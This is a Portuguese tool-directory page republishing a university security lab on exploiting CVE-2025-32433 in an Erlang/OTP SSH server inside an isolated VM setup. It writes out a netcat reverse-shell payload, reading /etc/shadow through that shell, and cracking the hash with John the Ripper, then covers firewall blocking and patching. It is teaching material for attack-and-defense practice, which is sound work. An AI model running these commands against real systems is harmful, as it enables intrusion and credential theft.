Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Exploiting-a-vulnerability-using-reverse-shell — Este projeto simula um cenário realista de ataque e defesa em duas máquinas virtuais. Você irá explorar uma vulnerabilidade crítica de RCE pré-autenticação (CVE-2025-32433) em um servidor SSH Erlang/OTP, quebrar hashes de senha extraídos e, em seguida, endurecer a máquina vítima com regras de firewall e aplicação de patches. | Kitploit
Ferramentas/GitHubGitHub/dampedcoast/exploiting-a-vulnerability-using-reverse-shell
Quebra de SenhasAnálise de VulnerabilidadesExploraçãoSegurança de RedeCTFTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Este projeto simula um cenário realista de ataque e defesa em duas máquinas virtuais. Você irá explorar uma vulnerabilidade crítica de RCE pré-autenticação (CVE-2025-32433) em um servidor SSH Erlang/OTP, quebrar hashes de senha extraídos e, em seguida, endurecer a máquina vítima com regras de firewall e aplicação de patches.

GitHub
dampedcoast/exploiting-a-vulnerability-using-reverse-shell

Exploiting-a-vulnerability-using-reverse-shell

Ver Repositório
há 2 mesesAinda não revisado
Compartilhar

Fundamentos de Segurança da Informação — Projeto da Primavera de 2026

Total de pontos: 20 | Prazo final: Não serão aceitas submissões atrasadas

Visão Geral

Este projeto simula um cenário realista de ataque e defesa em duas máquinas virtuais. Você irá explorar uma vulnerabilidade crítica de RCE pré-autenticação (CVE-2025-32433) em um servidor SSH Erlang/OTP, quebrar os hashes de senha extraídos e, em seguida, endurecer a máquina vítima com regras de firewall e aplicação de patches.

FunçãoSO
AtacanteKali Linux
VítimaUbuntu/Debian (Erlang/OTP SSH v27.3.2)

Arquivos

ArquivoDescrição
Debian-1.ovaImagem de VM da vítima pré-construída — baixe separadamente, veja Recursos (grande demais para o GitHub)

Recursos

  • VM da vítima (Debian-1.ova): Link para download — grande demais (~3GB) para hospedar no GitHub. Baixe separadamente e importe no VirtualBox/VMware conforme descrito abaixo.
  • Wordlist (rockyou_txt.txt): incluída neste repositório, usada na etapa de quebra de senha da Parte 2.

Configuração

  1. Importar VMs — Carregue Debian-1.ova e sua VM do Kali Linux no VirtualBox/VMware.
  2. Rede — Configure ambas as VMs para Host-Only Adapter para que possam se comunicar de forma privada.
  3. IP da vítima — Inicie a vítima e execute ifconfig para descobrir o IP dela (normalmente em 192.168.56.0/24).

Parte 1 — Implantação e Exploração do Servidor SSH Vulnerável (10 pts)

Reconhecimento

root@kitploit:~
nmap -p 2222 -sV -A <victim-IP>

Documente portas abertas, versões de serviços e assinaturas do Erlang.

Explorar a CVE-2025-32433 (RCE pré-autenticação)

Alterne temporariamente o Kali para NAT para clonar o repositório e, em seguida, volte para Host-Only.

root@kitploit:~
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py

Edite o script — defina HOST = "<victim-IP>" e atualize o payload:

root@kitploit:~
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'

Terminal 1 (Kali) — inicie o listener:

root@kitploit:~
nc -lvnp 4444

Terminal 2 (Kali) — execute o exploit:

root@kitploit:~
python3 CVE-2025-32433.py

No shell reverso, execute whoami e hostname para confirmar o acesso.


Parte 2 — Pós-exploração e Quebra de Senhas (5 pts)

Extrair e Quebrar o Hash

root@kitploit:~
# On victim (via reverse shell)
cat /etc/shadow | grep testuser > hash.txt

# On Kali
john --wordlist=rockyou_txt.txt hash.txt

Documente o formato do hash (por exemplo, $6$ = SHA-512), o tempo necessário e a senha em texto puro recuperada.

Encontrar a Flag

root@kitploit:~
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt

Parte 3 — Controles e Remediação (5 pts)

Bloquear o Vetor de Ataque (iptables)

root@kitploit:~
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP

Execute novamente a varredura Nmap e o exploit a partir do Kali — documente que a porta 2222 agora está "Filtered" e que o exploit falha.

Corrigir a Vulnerabilidade

Documente as etapas para atualizar o Erlang/OTP para v27.3.3 ou posterior, que contém a correção para a CVE-2025-32433.


Entregáveis

  • Relatório completo com capturas de tela de: varredura, execução do exploit, shell reverso (whoami/hostname) e captura da flag
  • Documentação do firewall antes/depois (resultados do Nmap mostrando a mudança de estado da porta)
  • Reflexão escrita explicando por que RCEs de pré-autenticação são significativamente mais perigosos do que exploits pós-autenticação

Referência da CVE

CVE-2025-32433 — Execução remota de código crítica de pré-autenticação no servidor SSH Erlang/OTP. Explorável pelo envio de pacotes SSH malformados antes de qualquer troca de credenciais, concedendo a um atacante não autenticado acesso total ao shell.

Baixar ferramenta
Project Spring 2026 - Google Docs.pdfInstruções completas do projeto com os entregáveis
rockyou_txt.txtWordlist usada com o John the Ripper para quebrar o hash de senha extraído